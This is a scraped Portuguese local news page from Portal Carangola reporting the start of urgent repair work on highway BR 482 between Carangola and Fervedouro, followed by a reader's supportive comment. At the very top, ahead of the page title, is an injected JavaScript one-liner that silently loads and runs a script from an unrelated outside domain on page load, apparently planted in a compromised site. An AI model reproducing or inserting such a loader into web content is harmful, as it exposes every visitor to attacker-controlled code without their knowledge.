;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Iniciadas as obras de recuperação BR 482 trecho Carangola/Fervedouro. - Portal Carangola

www.portalcarangola.com

O primeiro portal de notícias de Carangola-MG e região.

Portal Carangola

O 1º site de notícias de Carangola e Região

Iniciadas as obras de recuperação BR 482 trecho Carangola/Fervedouro.

Depois de muitas reivindicações e até mesmo uma manifestação popular,  finalmente o DNIT (Departamento Nacional de Infra-Estrutura de Transportes)  deu inicio as obras de recuperação urgente da BR 482. Homens  já trabalham por toda rodovia  que há pouco tempo estava interditado em virtude do excesso de buracos, falta de sinalização, dentre outros graves problemas como enormes crateras, o que ainda pode ser visto próximo a Carangola, nas imediações do antigo motel.
Todas as providências necessárias (limpeza de canaletas, aterros, dentre outras ações) estão sendo tomadas   para execução das obras de recuperação da rodovia. Atualmente um trabalho de recuperação urgente (Tapa buracos)  vem sendo desenvolvido do trecho que liga Carangola a Fervedouro. A informação  é que após a realização deste serviço mais urgente, será feito um recapiamento de toda a pista.

Fonte: Jornal “O Campeão”



Ofertas: tenischinelos

3 thoughts on “Iniciadas as obras de recuperação BR 482 trecho Carangola/Fervedouro.

  1. João Carlos, você e todo o povo de Carangola, estão de parabéns pela luta empreendida e a vitória conquistada.
    Fico feliz de saber que resta um pouco de juízo na cabeça das autoridades responsáveis pela manutenção dessa estrada, tantas vêzes considerada aqui, vital para o crescimento e desenvolvimento de nossa tão querida “Carangola”.
    Continue nessa cruzada e pode sempre contar com nosso apoio.
    Abraços.
    Maurício.

Deixe um comentário

O seu endereço de e-mail não será publicado. Campos obrigatórios são marcados com *

Esse site utiliza o Akismet para reduzir spam. Aprenda como seus dados de comentários são processados.